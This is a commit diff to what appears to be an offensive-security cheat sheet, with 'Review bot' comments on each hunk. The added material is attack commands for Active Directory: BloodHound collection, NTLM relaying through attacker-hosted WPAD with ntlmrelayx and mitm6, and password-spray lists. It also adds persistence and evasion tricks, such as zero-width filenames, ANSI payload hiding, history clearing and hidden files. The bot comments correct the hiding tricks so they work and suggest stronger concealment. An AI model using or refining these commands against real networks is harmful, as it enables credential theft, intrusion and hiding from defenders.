BloodHound ZIP + Zero Width space tip

Swissky 2020-01-19 22:46:45 +01:00
parent 590b7681e4
commit be0397fa68
3 changed files with 19 additions and 4 deletions

@ -77,6 +77,8 @@
SharpHound.exe (from resources/Ingestor)
SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100
SharpHound.exe -c all -d active.htb -SearchForest
SharpHound.exe --EncryptZip --ZipFilename export.zip
or
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
or
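Review bot: flag style is inconsistent in the added SharpHound lines: `-SearchForest` uses a single dash while the neighbouring `--domaincontroller`, `--EncryptZip` and `--ZipFilename` use two, so the reader cannot tell which form the ingestor expects. The new line `SharpHound.exe --EncryptZip --ZipFilename export.zip` also carries none of the `-c all -d active.htb` collection arguments that every other example uses, so it reads as a standalone invocation rather than as options to add to one of them; suggest `SharpHound.exe -c all -d active.htb --EncryptZip --ZipFilename export.zip` plus a short comment on where the operator gets the ZIP password, since an encrypted archive cannot be imported into BloodHound without it.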
@ -112,6 +114,7 @@
# -wh: Server hosting WPAD file (Attackers IP)
# -t: Target (You cannot relay credentials to the same device that youre spoofing)
# -i: open an interactive shell
ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access
```
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
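Review bot: the added comment `# -i: open an interactive shell` documents an option that the example command `ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access` never uses, so the reader has no example of where `-i` goes or what it combines with; either append an invocation that uses `-i` or drop the comment. While touching this block, the line above it has `youre` for `you're`.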
@ -540,7 +543,7 @@ Password spraying refers to the attack method that takes a large number of usern
Most of the time the best passwords to spray are :
- Password123, mimikatz
- P@ssw0rd01, Password123, mimikatz
- Welcome1/Welcome01
- $Companyname1 : $Microsoft1
- SeasonYear : Winter2019*,Spring2020!,Summer2018?
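Review bot: the replacement line `- P@ssw0rd01, Password123, mimikatz` keeps the comma-separated style while the rest of the list mixes separators (`Welcome1/Welcome01` uses a slash, `$Companyname1 : $Microsoft1` a colon, `Winter2019*,Spring2020!,Summer2018?` commas with no spaces); since these lines are meant to be copied into a spray list, one candidate per line, or at least one consistent separator, would be clearer. `$Companyname1 : $Microsoft1` also reads as a placeholder pair rather than two candidates; if `$Companyname` means "substitute the target's name", say so in the line.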
@ -936,9 +939,9 @@ cme smb $hosts --gen-relay-list relay.txt
mitm6 -i eth0 -d $domain
# spoofing WPAD and relaying NTLM credentials
http://ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
or
http://ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug
ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug
```
#### Drop the MIC
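Review bot: good fix on the stray `http://` prefixes, which made both `ntlmrelayx.py` commands uncopyable. The bare `or` on the line between the two corrected commands still sits inside the fenced block and renders as if it were a command; make it a comment (`# or`) or split the block in two so each invocation stands alone.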

@ -137,10 +137,16 @@ Add an ssh key into the `~/.ssh` folder.
Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload.
```bash
```powershell
## Do not remove. Generated from /etc/issue.conf by configure.
```
Hide in plain sight using zero width spaces in filename.
```powershell
touch $(echo -n 'index\u200D.php') index.php
```
Clear the last line of the history.
```bash
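Review bot: two problems in this hunk. The fence for the ANSI-character block is changed from ```bash to ```powershell, but the payloads in this file are shell commands (the `touch` line and the history-clearing block right below it are bash), so the tag should stay `bash`, and the same applies to the new ```powershell fence around the `touch` line. Second, `touch $(echo -n 'index\u200D.php') index.php` will not produce the intended filename: `echo -n` does not interpret `\u` escapes (bash's builtin needs `-e`, and `\uXXXX` support varies by shell), so the file is literally named `index\u200D.php`; use `touch $'index\u200D.php' index.php` or `touch "$(printf 'index\u200D.php')" index.php`, both of which rely on bash 4.2+ `\u` handling. Also, U+200D is the zero width joiner, not a zero width space; the zero width space is U+200B, so either fix the prose or use `\u200B`.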

@ -21,6 +21,12 @@
## Userland
Set a file as hidden
```powershell
attrib +h c:\autoexec.bat
```
### Registry
Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows.
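Review bot: `Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows.` gives a truncated path; the Run key is `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`, and stating it in full saves the reader a lookup and avoids confusion with the other keys under that hive. For the new `attrib +h c:\autoexec.bat` block, a one-line note that `+h` only hides the file from default listings (`dir /a` and Explorer's "show hidden files" still reveal it) would set expectations; `+s` is commonly added alongside `+h` to also hide it from the default "show hidden files" view.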